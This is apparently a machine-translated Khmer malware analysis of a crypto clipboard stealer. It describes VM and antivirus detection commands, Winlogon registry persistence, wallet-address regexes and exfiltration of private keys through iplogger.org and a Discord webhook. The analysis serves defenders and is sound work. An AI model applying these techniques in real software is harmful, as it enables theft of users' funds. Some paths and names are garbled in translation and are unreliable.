ដើម្បីផ្ទៀងផ្ទាត់ថាវាដំណើរការក្នុងម៉ាស៊ីននិម្មិត មេរោគប្រើបន្ទាត់ពាក្យបញ្ជា Windows WMI (WMIC) ដែលភ្ជាប់មកជាមួយដើម្បីស្នើសុំព័ត៌មាន BIOS ពោលគឺ៖

wmic bios

បន្ទាប់មកកម្មវិធីញែកលទ្ធផលពាក្យបញ្ជា ហើយរកមើលពាក្យគន្លឹះ៖ VBOX, VirtualBox, XEN, qemu, bochs, VM ។

ដើម្បីស្វែងរកផលិតផលកំចាត់មេរោគ មេរោគបានផ្ញើសំណើរសុំ Windows Management Instrumentation (WMI) ទៅកាន់ Windows Security Center ដោយប្រើប្រាស់ ManagementObjectSearcher API ដូចបង្ហាញខាងក្រោម។ បន្ទាប់ពីការឌិកូដពី base64 ការហៅមើលទៅដូចនេះ៖

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

រូបភាពទី 3. ដំណើរការកំណត់អត្តសញ្ញាណផលិតផលកំចាត់មេរោគ។

លើសពីនេះទៀតមេរោគពិនិត្យមើលថាតើ CryptoClipWatcherដែលជាឧបករណ៍ដើម្បីការពារប្រឆាំងនឹងការវាយប្រហាររបស់ក្តារតម្បៀតខ្ទាស់ ហើយប្រសិនបើដំណើរការ ព្យួរខ្សែស្រលាយទាំងអស់នៅក្នុងដំណើរការនោះ ដោយហេតុនេះអាចបិទការការពារ។

ការតស៊ូ

កំណែនៃមេរោគដែលយើងសិក្សាបានចម្លងខ្លួនវាទៅក្នុង %APPDATA%googleupdater.exe ហើយកំណត់គុណលក្ខណៈ "លាក់" សម្រាប់ថត Google ។ បន្ទាប់មកនាងផ្លាស់ប្តូរតម្លៃ SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell នៅក្នុងបញ្ជីឈ្មោះវីនដូ ហើយបន្ថែមផ្លូវ updater.exe. វិធីនេះ មេរោគនឹងត្រូវបានប្រតិបត្តិរាល់ពេលដែលអ្នកប្រើប្រាស់ចូល។

អាកប្បកិរិយាព្យាបាទ

ដូច ClipBanker មេរោគនេះត្រួតពិនិត្យមាតិកានៃក្តារតម្បៀតខ្ទាស់ ហើយរកមើលអាសយដ្ឋានកាបូបលុយគ្រីបតូ ហើយនៅពេលរកឃើញ ជំនួសវាដោយអាសយដ្ឋានមួយនៃប្រតិបត្តិករ។ ខាងក្រោមនេះគឺជាបញ្ជីអាសយដ្ឋានគោលដៅដោយផ្អែកលើអ្វីដែលត្រូវបានរកឃើញនៅក្នុងកូដ។

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

សម្រាប់ប្រភេទអាសយដ្ឋាននីមួយៗមានកន្សោមទៀងទាត់ដែលត្រូវគ្នា។ តម្លៃ STEAM_URL ត្រូវបានប្រើដើម្បីវាយប្រហារប្រព័ន្ធ Steam ដូចដែលអាចមើលឃើញពីកន្សោមធម្មតាដែលត្រូវបានប្រើដើម្បីកំណត់នៅក្នុងបណ្តុំ៖

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

ឆានែលការបន្សុទ្ធ

បន្ថែមពីលើការជំនួសអាសយដ្ឋាននៅក្នុងសតិបណ្ដោះអាសន្ន មេរោគនេះកំណត់គោលដៅលើសោ WIF ឯកជនរបស់ Bitcoin, Bitcoin Core និង Electrum Bitcoin wallets។ កម្មវិធីនេះប្រើ plogger.org ជាឆានែលបណ្ដេញចេញ ដើម្បីទទួលបានសោឯកជន WIF ។ ដើម្បីធ្វើដូច្នេះ ប្រតិបត្តិករបន្ថែមទិន្នន័យសោឯកជនទៅបឋមកថា User-Agent HTTP ដូចបានបង្ហាញខាងក្រោម។

រូបភាពទី 4. កុងសូល IP Logger ជាមួយនឹងទិន្នន័យលទ្ធផល។

ប្រតិបត្តិករមិនបានប្រើ iplogger.org ដើម្បីបន្សុទ្ធកាបូបទេ។ ពួកគេប្រហែលជាបានប្រើវិធីផ្សេងគ្នាដោយសារតែដែនកំណត់តួអក្សរ 255 នៅក្នុងវាល User-Agentបង្ហាញនៅក្នុងចំណុចប្រទាក់បណ្តាញ IP Logger ។ នៅក្នុងគំរូដែលយើងបានសិក្សា ម៉ាស៊ីនមេលទ្ធផលផ្សេងទៀតត្រូវបានរក្សាទុកក្នុងអថេរបរិស្ថាន DiscordWebHook. គួរឱ្យភ្ញាក់ផ្អើល អថេរបរិស្ថាននេះមិនត្រូវបានកំណត់នៅកន្លែងណាមួយនៅក្នុងកូដនោះទេ។ នេះបង្ហាញថាមេរោគនៅតែស្ថិតក្រោមការអភិវឌ្ឍន៍ ហើយអថេរត្រូវបានផ្តល់ទៅឱ្យម៉ាស៊ីនសាកល្បងរបស់ប្រតិបត្តិករ។

មានសញ្ញាមួយទៀតដែលថាកម្មវិធីកំពុងស្ថិតក្នុងការអភិវឌ្ឍន៍។ ឯកសារគោលពីររួមមាន iplogger.org URLs ពីរ ហើយទាំងពីរត្រូវបានសួរនៅពេលទិន្នន័យត្រូវបានស្រង់ចេញ។ នៅក្នុងការស្នើសុំទៅកាន់ URLs មួយក្នុងចំណោម URL ទាំងនេះ តម្លៃនៅក្នុងវាល Referer ត្រូវបាននាំមុខដោយ "DEV /" ។ យើង​ក៏​បាន​រក​ឃើញ​កំណែ​ដែល​មិន​ត្រូវ​បាន​ខ្ចប់​ដោយ​ប្រើ ConfuserEx អ្នក​ទទួល​សម្រាប់ URL នេះ​មាន​ឈ្មោះ​ថា DevFeedbackUrl។ ដោយផ្អែកលើឈ្មោះអថេរបរិស្ថាន យើងជឿថាប្រតិបត្តិករគ្រោងនឹងប្រើប្រាស់សេវាកម្មស្របច្បាប់ Discord និងប្រព័ន្ធស្ទាក់ចាប់គេហទំព័ររបស់ខ្លួនដើម្បីលួចកាបូបលុយគ្រីបតូ។

សេចក្តីសន្និដ្ឋាន

យុទ្ធនាការនេះគឺជាឧទាហរណ៍នៃការប្រើប្រាស់សេវាកម្មផ្សាយពាណិជ្ជកម្មស្របច្បាប់ក្នុងការវាយប្រហារតាមអ៊ីនធឺណិត។ គ្រោងការណ៍នេះផ្តោតលើអង្គការរុស្ស៊ី ប៉ុន្តែយើងនឹងមិនភ្ញាក់ផ្អើលទេដែលឃើញការវាយប្រហារបែបនេះដោយប្រើសេវាកម្មដែលមិនមែនជារបស់រុស្ស៊ី។ ដើម្បីជៀសវាងការសម្របសម្រួល អ្នកប្រើប្រាស់ត្រូវតែជឿជាក់លើកេរ្តិ៍ឈ្មោះនៃប្រភពនៃកម្មវិធីដែលពួកគេទាញយក។

បញ្ជីពេញលេញនៃសូចនាករនៃការសម្របសម្រួល និងគុណលក្ខណៈ MITER ATT&CK មាននៅ តំណភ្ជាប់.

ប្រភព: www.habr.com